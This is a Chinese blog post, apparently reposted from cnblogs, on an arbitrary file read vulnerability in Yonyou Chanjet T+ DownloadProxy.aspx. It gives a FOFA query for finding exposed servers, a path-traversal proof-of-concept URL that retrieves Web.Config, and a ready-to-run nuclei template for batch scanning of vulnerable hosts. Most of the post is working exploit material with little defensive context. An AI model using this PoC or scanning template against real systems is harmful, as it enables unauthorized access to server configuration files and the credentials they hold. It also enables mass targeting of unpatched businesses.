首页 > 编程语言 >用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

时间:2023-09-07 14:12:44浏览次数:38  
标签:文件 .. DownloadProxy 漏洞 aspx 捷通

漏洞描述

用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件

漏洞复现

fofa语法:app="畅捷通-TPlus"
登录页面如下

POC:
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

nuclei批量yaml文件

id: yonyou_changjietong_DownloadProxy_readfile

info:
  name: yonyou_changjietong_DownloadProxy_readfile
  author: bjx
  severity: high
  tags: yonyou,changjietong,yonyouoa,oa
requests:
  - method: GET
    path:
      - "{{BaseURL}}/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SYSTEMDB"
          - "ProductInfo"
          - "<?xml"
        part: body
        condition: and

      - type: status
        status:
          - 200

标签:文件,..,DownloadProxy,漏洞,aspx,捷通
From: https://www.cnblogs.com/pursue-security/p/17684714.html

相关文章

  • aspx导出数据方法
    1、导出txtprivatestaticvoidExport(DataTabletb,stringfileName){HttpContext.Current.Response.Clear();stringFileName=fileName+".txt";HttpContext.Current.Response.Buffer=true;HttpContext.Current.Respons......
  • 畅捷通T+ GetStoreWarehouseByStore 反序列化分析
    漏洞描述畅捷通T+前台存在反序列化漏洞,攻击者可直接利用此漏洞执行任意命令影响版本T+13.0、T+16.0漏洞分析漏洞主要是因为ajaxPro组件存在CVE-2021-23758,但是这个漏洞有个要求是传输的参数类型必须是object通过反编译App_Code.dll的Ufida.T.CodeBehind._PriorityLevel中G......
  • ASPX页面如何加载GAC中的组件?
    注意这里是ASPX页面而不是ASPX.cs代码页面引用GAC的组件;要ASPX页面引用GAC中的组件,则需要做下面两步:一、在machine.config中增加你的assembly:在<assemblies>节(在<configuration>/<system.web>/<compilation>/<compilers>/<assemblies>可以找到这个节)中增加下面......
  • 银联notifyurl报错302重定向的问题排查,太奇怪了!AspxAutoDetectCookieSupport=1
    用银联的notifyurl接收通知,某一天突然通知没有了,日志里直接没有,就和银联的人一起查,发现错误302重定向。这个notifyurl用浏览器可以正常打开。但是发现打开后会自动追加一段:AspxAutoDetectCookieSupport=1。于是搜,最终发现问题如下图:在会话状态里cookie模式改成了自动检测,导致iis......
  • 打印畅捷通字样如何删掉
    T+打印畅捷通字样如何删掉以系统管理员admin身份登录系统管理,在空白位置按快捷键【Ctrl+Alt+Y】,弹出【打印附加信息配置】页面,取消勾选【打印附加信息】,这样打印模板上就不会有畅捷通字样了,若想打印本公司名称则在【打印附加信息】后录入本公司单位名称即可。注:T+12.3更新最新补......
  • vs 发布程序 报错 TS0053/.aspx.cs不存在/
    vs发布一些旧的系统时候,会报一些错误,阻止发布。1.分析器错误:XXX.aspx.cs文件不存在但检查的时候发现文件存在的好好的,对比发现是在aspx页面的第一行:<%@PageLanguage="C......
  • javaEE007.03 JSP简介、helloworld、运行原理(包含新建JSP、默认字符设置 C#中叫aspx)
    系列文章目录文章目录​​系列文章目录​​​​前言​​​​一、JSP简介​​​​简介​​​​二、helloworld——怎么写java代码​​​​二、、运行原理​​​​总结​​......
  • 畅捷通T+与道一云对接集成报销信息列表连通凭证创建
    畅捷通T+与道一云对接集成获取报销信息列表连通凭证创建数据源系统:道一云在道一云坚实的技术基础上,道一云推出全新升级的2.0产品矩阵,分别是低码平台、智能门户、场景......
  • 畅捷通T+和旺店通·企业奇门单据接口对接
    ​​​​数据源平台:旺店通·企业奇门慧策最先以旺店通ERP切入商家核心管理痛点——订单管理,之后围绕电商经营管理中的核心管理诉求,先后布局流量获取、会员管理、仓库管理等......
  • 道一云与畅捷通T+对接集成获取报销信息列表=>凭证创建
    ​​​​数据源平台:道一云在道一云坚实的技术基础上,道一云推出全新升级的2.0产品矩阵,分别是低码平台、智能门户、场景应用。基于云原生底座,为企业提供集智能门户解决网关流......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99